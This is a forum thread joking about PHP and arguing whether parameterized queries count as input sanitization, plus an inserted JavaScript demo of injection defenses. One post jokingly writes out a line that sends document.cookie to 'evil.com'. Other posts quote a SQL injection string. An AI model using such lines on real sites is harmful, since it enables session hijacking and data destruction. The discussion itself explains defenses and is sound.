TRWTF is PHP


  • Considered Harmful

    @Salamander said:

    @Snooder said:

    What else would you call it?

    I wouldn't call it anything.
    The entire point of parameterised queries is that you divide it into two parts: data and code. You supply data for the code to operate on at the appropriate time.
    Consider JavaScript's Function constructor:

    var strcat = Function('a', 'b', 'return "" + a + b');
    strcat('123;//', '456');
    

    Results in the string '123;//456'. Neither argument is being escaped or sanitised, yet it still behaves exactly as you would expect it to.

    The entire concept of sanitisation/escaping doesn't apply. It's like asking someone "What did you name your dog?" when they have never owned a dog.


    Please don't illustrate points using code that no one should ever use. There's no reason to eval strings in Javascript ever. Use closures.
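
An added example, not part of the original thread, that puts the three approaches being argued about side by side in plain JavaScript, using the Function constructor as the "query engine" the way Salamander's snippet does: splicing the untrusted value into the function source (string-built SQL), escaping it first (input sanitization), and passing it as an argument (a parameterized query). The function names and the attacker inputs are constructed for the example and appear nowhere in the thread.

```javascript
// Added example (not code from the thread): the parameterization argument,
// restated with the Function constructor standing in for the SQL engine.

// 1. "Build the query as a string": the untrusted value is spliced into the
//    SOURCE, so the engine parses its characters as code.
function checkByConcatenation(expected, userInput) {
  const src = 'var ok = "' + expected + '" === "' + userInput + '"; return ok;';
  return Function(src)();
}

// 2. "Escape, then concatenate": still spliced into the source, but with the
//    metacharacters we remembered to handle backslash-escaped first.
//    (Assumption for the example: the escaper only knows about " and \.)
function escapeForDoubleQuotedLiteral(s) {
  return s.replace(/["\\]/g, '\\$&');
}
function checkByEscaping(expected, userInput) {
  return checkByConcatenation(escapeForDoubleQuotedLiteral(expected),
                              escapeForDoubleQuotedLiteral(userInput));
}

// 3. "Parameterized": the source is a fixed constant; the untrusted value
//    arrives as an argument at call time and is never parsed as code.
const checkByParameter = Function('expected', 'userInput', 'return userInput === expected;');

// Run one strategy and report either its boolean result or the error class name.
function run(strategy, expected, userInput) {
  try {
    return strategy(expected, userInput);
  } catch (e) {
    return e.constructor.name; // e.g. 'SyntaxError' when the source no longer parses
  }
}

const EXPECTED = 'hunter2';
// Constructed attacker inputs (not from the thread):
const OR_TRUE = '" || true || "';  // the JavaScript spelling of   ' OR '1'='1
const NEWLINE = 'hunter2\n';        // a raw line terminator inside a "..." literal is a syntax error

// Returns a table: strategy -> input -> result (true/false or error name).
function demo() {
  const strategies = { concat: checkByConcatenation, escaped: checkByEscaping, param: checkByParameter };
  const inputs = { honest: 'hunter2', orTrue: OR_TRUE, newline: NEWLINE };
  const table = {};
  for (const [sName, strategy] of Object.entries(strategies)) {
    table[sName] = {};
    for (const [iName, input] of Object.entries(inputs)) {
      table[sName][iName] = run(strategy, EXPECTED, input);
    }
  }
  return table;
}

console.table(demo());
```

The table it prints is the thread's point in one place: the concatenated variant returns true for the `" || true || "` input; the escaped variant stops that input only because the escaper happened to know about double quotes, and it still blows up with a SyntaxError on a raw newline, because the value is still being parsed as code; the parameterized variant never parses the value at all, so there is nothing to escape and both hostile inputs simply compare unequal.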



  • @joe.edwards said:

    @Salamander said:
    @Snooder said:

    What else would you call it?

    I wouldn't call it anything.
    The entire point of parameterised queries is that you divide it into two parts: data and code. You supply data for the code to operate on at the appropriate time.
    Consider JavaScript's Function constructor:

    var strcat = Function('a', 'b', 'return "" + a + b');
    strcat('123;//', '456');
    

    Results in the string '123;//456'. Neither argument is being escaped or sanitised, yet it still behaves exactly as you would expect it to.

    The entire concept of sanitisation/escaping doesn't apply. It's like asking someone "What did you name your dog?" when they have never owned a dog.


    Please don't illustrate points using code that no one should ever use. There's no reason to eval strings in Javascript ever. Use closures.

    Right, closures, like var strcat = Function('a','b', 'return window.close()');



  • @Buttembly Coder said:

    @joe.edwards said:
    @Salamander said:
    @Snooder said:

    What else would you call it?

    I wouldn't call it anything.
    The entire point of parameterised queries is that you divide it into two parts: data and code. You supply data for the code to operate on at the appropriate time.
    Consider JavaScript's Function constructor:

    var strcat = Function('a', 'b', 'return "" + a + b');
    strcat('123;//', '456');
    

    Results in the string '123;//456'. Neither argument is being escaped or sanitised, yet it still behaves exactly as you would expect it to.

    The entire concept of sanitisation/escaping doesn't apply. It's like asking someone "What did you name your dog?" when they have never owned a dog.


    Please don't illustrate points using code that no one should ever use. There's no reason to eval strings in Javascript ever. Use closures.

    Right, closures, like var strcat = Function('a','b', 'return window.close()');

    No, you're not supposed to use strings, you idiot!

    var strcat = Function(a, b, window.close()); // why does it not let me write return here???????????


  • @joe.edwards said:

    Please don't illustrate points using code that no one should ever use. There's no reason to eval strings in Javascript ever. Use closures.

    Closures do not illustrate my point in the same way, so no.



  • @Salamander said:

    @joe.edwards said:
    Please don't illustrate points using code that no one should ever use. There's no reason to eval strings in Javascript ever. Use closures.

    Closures do not illustrate my point in the same way, so no.

    Oh, so you wanted to show us that anything you put into Function() is automatically converted to something safe to execute?
    Function('a', 'b', 'location = "http://evil.com/malicious.php?" + document.cookie')


  • @Ben L. said:

    Oh, so you wanted to show us that anything you put into Function() is automatically converted to something safe to execute?

    Function('a', 'b', 'location = "http://evil.com/malicious.php?" + document.cookie')

    I'm not sure what point you're trying to make, because that would literally accomplish the same thing as the closure
    function(a, b) { location = "http://evil.com/malicious.php?" + document.cookie }
    Unless your point is that you don't understand what you're talking about.



  • @Salamander said:

    @Ben L. said:
    ...
    Unless your point is that you don't understand what you're talking about.
    Would that come as a surprise to you?



  • @HardwareGeek said:

    @Salamander said:
    @Ben L. said:
    @Salamander said:
    @Ben L. said:
    @Buttembly Coder said:
    @joe.edwards said:
    @Salamander said:
    @Snooder said:
    @RangerNS said:
    @abarker said:

    @Salamander said:

    @Ben L. said:

    @Sir Twist said:

     If you’re worried about sanitizing your database inputs, you’ve already lost.

    Parameterized queries are a form of sanitization, so I guess those are right out.

    Stay in school, Ben.

    Ben was making a point about Sir Twist's comment:

    @Sir Twist said:

    If you’re worried about sanitizing your database inputs, you’ve already lost.

    Of course sanitization by using parameterized queries is a good idea. I would even venture to say that it is a best practice for preventing SQL injection attacks. Don't be a dick by taking his sarcasm out of context.

    Then again, the tag you gave your post indicates you may not even understand what a parameterized query is. In case you don't, here's a little lesson. Let's say you want to select records from a table called Players with a given name. Using a parameterized query, you would create a parameter, say @Name, and give it the value of your user input. Then you would use it as follows:

    SELECT * FROM Players WHERE Name = @Name

    That way, you aren't directly using the user input, and you don't have to worry if someone enters "John Smith'; DROP Players", because your query will just return records with a name of "John Smith'; DROP Players". It's not very likely they'll get anything back, but your data will remain safe.

     Stay in school, Salamander.

    He knows what parameterized queries are, he (and I) just doesn't consider that to be "sanitization".

    What else would you call it?

    I wouldn't call it anything.
    The entire point of parameterised queries is that you divide it into two parts: data and code. You supply data for the code to operate on at the appropriate time.
    Consider JavaScript's Function constructor:

    var strcat = Function('a', 'b', 'return "" + a + b');
    strcat('123;//', '456');
    

    Results in the string '123;//456'. Neither argument is being escaped or sanitised, yet it still behaves exactly as you would expect it to.

    The entire concept of sanitisation/escaping doesn't apply. It's like asking someone "What did you name your dog?" when they have never owned a dog.


    Please don't illustrate points using code that no one should ever use. There's no reason to eval strings in Javascript ever. Use closures.

    Right, closures, like var strcat = Function('a','b', 'return window.close()');

    No, you're not supposed to use strings, you idiot!

    var strcat = Function(a, b, window.close()); // why does it not let me write return here???????????

    Closures do not illustrate my point in the same way, so no.

    Oh, so you wanted to show us that anything you put into Function() is automatically converted to something safe to execute?
    Function('a', 'b', 'location = "http://evil.com/malicious.php?" + document.cookie')
    Unless your point is that you don't understand what you're talking about.
    Would that come as a surprise to you?
    It comes as a surprise to me that several people on this forum have trouble understanding what is a joke and what isn't. Also, either Community Server corrupted the quotes in your posts or you just like removing context so you sound right. Also, if "my argument only works with the antipattern of eval" is a valid argument for Salamander, why can't I use it?

  • Considered Harmful

    @Ben L. said:

    @HardwareGeek said:
    @Salamander said:
    @Ben L. said:
    @Salamander said:
    @Ben L. said:
    @Buttembly Coder said:
    @joe.edwards said:
    @Salamander said:
    @Snooder said:
    @RangerNS said:
    @abarker said:

    @Salamander said:

    @Ben L. said:

    @Sir Twist said:

     If you’re worried about sanitizing your database inputs, you’ve already lost.

    Parameterized queries are a form of sanitization, so I guess those are right out.

    Stay in school, Ben.

    Ben was making a point about Sir Twist's comment:

    @Sir Twist said:

    If you’re worried about sanitizing your database inputs, you’ve already lost.

    Of course sanitization by using parameterized queries is a good idea. I would even venture to say that it is a best practice for preventing SQL injection attacks. Don't be a dick by taking his sarcasm out of context.

    Then again, the tag you gave your post indicates you may not even understand what a parameterized query is. In case you don't, here's a little lesson. Let's say you want to select records from a table called Players with a given name. Using a parameterized query, you would create a parameter, say @Name, and give it the value of your user input. Then you would use it as follows:

    SELECT * FROM Players WHERE Name = @Name

    That way, you aren't directly using the user input, and you don't have to worry if someone enters "John Smith'; DROP Players", because your query will just return records with a name of "John Smith'; DROP Players". It's not very likely they'll get anything back, but your data will remain safe.

     Stay in school, Salamander.

    He knows what parameterized queries are, he (and I) just doesn't consider that to be "sanitization".

    What else would you call it?

    I wouldn't call it anything.
    The entire point of parameterised queries is that you divide it into two parts: data and code. You supply data for the code to operate on at the appropriate time.
    Consider JavaScript's Function constructor:

    var strcat = Function('a', 'b', 'return "" + a + b');
    strcat('123;//', '456');
    

    Results in the string '123;//456'. Neither argument is being escaped or sanitised, yet it still behaves exactly as you would expect it to.

    The entire concept of sanitisation/escaping doesn't apply. It's like asking someone "What did you name your dog?" when they have never owned a dog.


    Please don't illustrate points using code that no one should ever use. There's no reason to eval strings in Javascript ever. Use closures.

    Right, closures, like var strcat = Function('a','b', 'return window.close()');

    No, you're not supposed to use strings, you idiot!

    var strcat = Function(a, b, window.close()); // why does it not let me write return here???????????

    Closures do not illustrate my point in the same way, so no.

    Oh, so you wanted to show us that anything you put into Function() is automatically converted to something safe to execute?
    Function('a', 'b', 'location = "http://evil.com/malicious.php?" + document.cookie')
    Unless your point is that you don't understand what you're talking about.
    Would that come as a surprise to you?
    It comes as a surprise to me that several people on this forum have trouble understanding what is a joke and what isn't. Also, either Community Server corrupted the quotes in your posts or you just like removing context so you sound right. Also, if "my argument only works with the antipattern of eval" is a valid argument for Salamander, why can't I use it?
    I usually recognize jokes because I experience at least mild amusement after hearing or reading them. So it's very challenging to tell when you are joking.


  • @Ben L. said:

    @HardwareGeek said:
    @Salamander said:
    @Ben L. said:
    ...
    Unless your point is that you don't understand what you're talking about.
    Would that come as a surprise to you?

    It comes as a surprise to me that several people on this forum have trouble understanding what is a joke and what isn't.
    Indeed. My comment was a joke. Perhaps not a good one, but a joke nonetheless. @Ben L. said:
    Also, either Community Server corrupted the quotes in your posts or you just like removing context so you sound right.
    I like trimming text that is irrelevant to my point. The only context required to understand my comment was the single sentence (fragment) of Salamander that I quoted, and the identity of the person to whom he/she/it was replying. @Ben L. said:
    Also, if "my argument only works with the antipattern of eval" is a valid argument for Salamander, why can't I use it?
    Use any bloody argument you want with Salamander; just make it entertaining.



  • @joe.edwards said:

    @Ben L. said:
    @HardwareGeek said:
    @Salamander said:
    @Ben L. said:
    @Salamander said:
    @Ben L. said:
    @Buttembly Coder said:
    @joe.edwards said:
    @Salamander said:
    @Snooder said:
    @RangerNS said:
    @abarker said:

    @Salamander said:

    @Ben L. said:

    @Sir Twist said:

     If you’re worried about sanitizing your database inputs, you’ve already lost.

     

    Parameterized queries are a form of sanitization, so I guess those are right out.

    Stay in school, Ben.

    Ben was making a point about Sir Twist's comment:

    @Sir Twist said:

    If you’re worried about sanitizing your database inputs, you’ve already lost.

    Of course sanitization by using parameterized queries is a good idea. I would even venture to say that it is a best practice for preventing SQL injection attacks. Don't be a dick by taking his sarcasm out of context.

    Then again, the tag you gave your post indicates you may not even understand what a parameterized query is. In case you don't, here's a little lesson. Let's say you want to select records from a table called Players with a given name. Using a parameterized query, you would create a parameter, say @Name, and give it the value of your user input. Then you would use it as follows:

    SELECT * FROM Players WHERE Name = @Name

    That way, you aren't directly using the user input, and you don't have to worry if someone enters "John Smith'; DROP Players", because your query will just return records with a name of "John Smith'; DROP Players". It's not very likely they'll get anything back, but your data will remain safe.

     Stay in school, Salamander.

    He knows what parameterized queries are, he (and I) just doesn't consider that to be "sanitization".

    What else would you call it?

    I wouldn't call it anything.
    The entire point of parameterised queries is that you divide it into two parts: data and code. You supply data for the code to operate on at the appropriate time.
    Consider JavaScript's Function constructor:

    var strcat = Function('a', 'b', 'return "" + a + b');
    strcat('123;//', '456');
    

    Results in the string '123;//456'. Neither argument is being escaped or sanitised, yet it still behaves exactly as you would expect it to.

    The entire concept of sanitisation/escaping doesn't apply. It's like asking someone "What did you name your dog?" when they have never owned a dog.

     


    Please don't illustrate points using code that no one should ever use. There's no reason to eval strings in Javascript ever. Use closures.

    Right, closures, like var strcat = Function('a','b', 'return window.close()');

    No, you're not supposed to use strings, you idiot!

    var strcat = Function(a, b, window.close()); // why does it not let me write return here???????????

    Closures do not illustrate my point in the same way, so no.

    Oh, so you wanted to show us that anything you put into Function() is automatically converted to something safe to execute?
    Function('a', 'b', 'location = "http://evil.com/malicious.php?" + document.cookie')
    Unless your point is that you don't understand what you're talking about.
    Would that come as a surprise to you?
    It comes as a surprise to me that several people on this forum have trouble understanding what is a joke and what isn't. Also, either Community Server corrupted the quotes in your posts or you just like removing context so you sound right. Also, if "my argument only works with the antipattern of eval" is a valid argument for Salamander, why can't I use it?
    I usually recognize jokes because I experience at least mild amusement after hearing or reading them. So it's very challenging to tell when you are joking.


    Insert snide comment here.

     



  • @gu3st said:

    No, retards are TRWTF. PHP is fine if written by non-retards.
     

    Well, the first fix a non-retard tries to apply is not using PHP in the first place. Of course, there are other fixes available if you do need to use it, but you don't normally go hunting for extra WTFs.



  • @dkf said:

    @Buttembly Coder said:
    TRWTF is that you're trusting PHP code...
    There's nothing about PHP that couldn't be fixed by investing in advanced physics, building a working time machine, going back in time to the early '90s, and killing the developers of PHP and all their families.

    They said that about Hitler too -- until they realized that if they bumped off Hitler, you'd just end up with someone that was even more evil.


    Be careful which language you kill -- you might just end up with whitespace or brainfuck as the replacement.



  • @DrPepper said:

    @dkf said:
    @Buttembly Coder said:
    TRWTF is that you're trusting PHP code...
    There's nothing about PHP that couldn't be fixed by investing in advanced physics, building a working time machine, going back in time to the early '90s, and killing the developers of PHP and all their families.

    They said that about Hitler too -- until they realized that if they bumped off Hitler, you'd just end up with someone that was even more evil.


    Be careful which language you kill -- you might just end up with whitespace or brainfuck as the replacement.

    Has anyone implemented a JVM in brainfuck/whitespace? Preferably in the same file.



  • @Mcoder said:

    @gu3st said:

    No, retards are TRWTF. PHP is fine if written by non-retards.
     

    Well, the first fix a non-retard tries to apply is not using PHP in the first place. Of course, there are other fixes available if you do need to use it, but you don't normally go hunting for extra WTFs.

    I used to think I didn't have a problem, then I tried not using PHP.  Now I don't have two problems.

     


  • Trolleybus Mechanic

    @da Doctah said:

    I used to think I didn't have a problem, then I tried not using PHP.  Now I don't have two problems.
     

    Or as it's known in PHP...

    bool function my_is_attributed_problem_not($array_of_problems, &$result)

    returns true when $array_of_problems is an array, false when $result is undefined, and null when $array_of_problems contains at least one non-null value.

    sets $result to true when $array_of_problems is not a double negative that results in false.

    depricated, use  my_is_real_attributed_problem_not($array_of_problems, &$result, $bool_invert_assign)



  • @Lorne Kates said:

    depricated, use  my_is_real_attributed_problem_not($array_of_problems, &$result, $bool_invert_assign)

    LORNE HAS DEPRECATED THE WORD DEPRECATED


  • Trolleybus Mechanic

    @Ben L. said:

    @Lorne Kates said:
    depricated, use  my_is_real_attributed_problem_not($array_of_problems, &$result, $bool_invert_assign)
    LORNE HAS DEPRECATED THE WORD DEPRECATED
    @Ben L. said:
    @Lorne Kates said:
    depricated, use  my_is_real_attributed_problem_not($array_of_problems, &$result, $bool_invert_assign)
    LORNE HAS DEPRECATED DEPRICATED THE WORD DEPRECATED
     

    You're welcome.



  • @Snooder said:

    @joe.edwards said:

    @Ben L. said:
    @HardwareGeek said:
    @Salamander said:
    @Ben L. said:
    @Salamander said:
    @Ben L. said:
    @Buttembly Coder said:
    @joe.edwards said:
    @Salamander said:
    @Snooder said:
    @RangerNS said:
    @abarker said:

    @Salamander said:

    @Ben L. said:

    @Sir Twist said:

     If you’re worried about sanitizing your database inputs, you’ve already lost.

     

    Parameterized queries are a form of sanitization, so I guess those are right out.

    Stay in school, Ben.

    Ben was making a point about Sir Twist's comment:

    @Sir Twist said:

    If you’re worried about sanitizing your database inputs, you’ve already lost.

    Of course sanitization by using parameterized queries is a good idea. I would even venture to say that it is a best practice for preventing SQL injection attacks. Don't be a dick by taking his sarcasm out of context.

    Then again, the tag you gave your post indicates you may not even understand what a parameterized query is. In case you don't, here's a little lesson. Let's say you want to select records from a table called Players with a given name. Using a parameterized query, you would create a parameter, say @Name, and give it the value of your user input. Then you would use it as follows:

    SELECT * FROM Players WHERE Name = @Name

    That way, you aren't directly using the user input, and you don't have to worry if someone enters "John Smith'; DROP Players", because your query will just return records with a name of "John Smith'; DROP Players". It's not very likely they'll get anything back, but your data will remain safe.

     Stay in school, Salamander.

    He knows what parameterized queries are, he (and I) just doesn't consider that to be "sanitization".

    What else would you call it?

    I wouldn't call it anything.
    The entire point of parameterised queries is that you divide it into two parts: data and code. You supply data for the code to operate on at the appropriate time.
    Consider JavaScript's Function constructor:

    var strcat = Function('a', 'b', 'return "" + a + b');
    strcat('123;//', '456');
    

    Results in the string '123;//456'. Neither argument is being escaped or sanitised, yet it still behaves exactly as you would expect it to.

    The entire concept of sanitisation/escaping doesn't apply. It's like asking someone "What did you name your dog?" when they have never owned a dog.

     


    Please don't illustrate points using code that no one should ever use. There's no reason to eval strings in Javascript ever. Use closures.

    Right, closures, like var strcat = Function('a','b', 'return window.close()');

    No, you're not supposed to use strings, you idiot!

    var strcat = Function(a, b, window.close()); // why does it not let me write return here???????????

    Closures do not illustrate my point in the same way, so no.

    Oh, so you wanted to show us that anything you put into Function() is automatically converted to something safe to execute?
    Function('a', 'b', 'location = "http://evil.com/malicious.php?" + document.cookie')
    Unless your point is that you don't understand what you're talking about.
    Would that come as a surprise to you?
    It comes as a surprise to me that several people on this forum have trouble understanding what is a joke and what isn't. Also, either Community Server corrupted the quotes in your posts or you just like removing context so you sound right. Also, if "my argument only works with the antipattern of eval" is a valid argument for Salamander, why can't I use it?
    I usually recognize jokes because I experience at least mild amusement after hearing or reading them. So it's very challenging to tell when you are joking.


    Insert snide comment here.

     

    My God, I think I can see the light at the end of this tunnel.


  • BINNED

    @Ben L. said:

    Has anyone implemented a JVM in brainfuck/whitespace? Preferably in the same file.
    That would be a good punishment to include in a remake of Dante's Inferno.


  • Considered Harmful

    @PedanticCurmudgeon said:

    @Ben L. said:
    Has anyone implemented a JVM in brainfuck/whitespace? Preferably in the same file.
    That would be a good punishment to include in a remake of Dante's Inferno.


  • Trolleybus Mechanic

    @joe.edwards said:

    @PedanticCurmudgeon said:
    @Ben L. said:
    Has anyone implemented a JVM in brainfuck/whitespace? Preferably in the same file.
    That would be a good punishment to include in a remake of Dante's Inferno.
     

    Get off my lawn (http://www.amazon.com/Inferno-Larry-Niven/dp/0765316765/ref=sr_1_1?ie=UTF8&qid=1392217886&sr=8-1&keywords=inferno+larry+niven)




  • @Lorne Kates said:

    @joe.edwards said:

    @PedanticCurmudgeon said:
    @Ben L. said:
    Has anyone implemented a JVM in brainfuck/whitespace? Preferably in the same file.
    That would be a good punishment to include in a remake of Dante's Inferno.
     

    Get off my lawn


    No, that would be in the sequel:

    Technology has advanced, even in Hell. In the City of Dis, the bureaucrats are busily digitizing all their records from paper, clay tablets, knotted strings, etc. There must be IT staff somewhere in the city to support them (although we never see them in the story; the main focus of the action in Dis is the lawyers.)

